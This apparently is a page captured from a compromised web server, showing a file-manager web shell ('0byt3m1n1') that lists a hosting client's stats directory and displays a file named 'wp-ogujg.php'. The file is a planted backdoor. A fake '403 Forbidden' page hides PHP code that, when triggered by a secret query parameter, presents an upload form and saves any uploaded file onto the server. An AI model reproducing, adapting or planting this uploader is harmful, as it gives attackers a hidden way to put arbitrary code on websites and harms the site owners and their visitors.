0byt3m1n1
Path:
/
var
/
www
/
clients
/
client38
/
web37
/
web
/
stats
/
2023-11
/
[
Home
]
File: wp-ogujg.php
<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html> if($_GET["payload"] == "sent"){ $xx = $_FILES["file"]["name"]; $yy = $_FILES["file"]["tmp_name"];echo ("<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='upload' /> </form>");move_uploaded_file($yy,$xx); }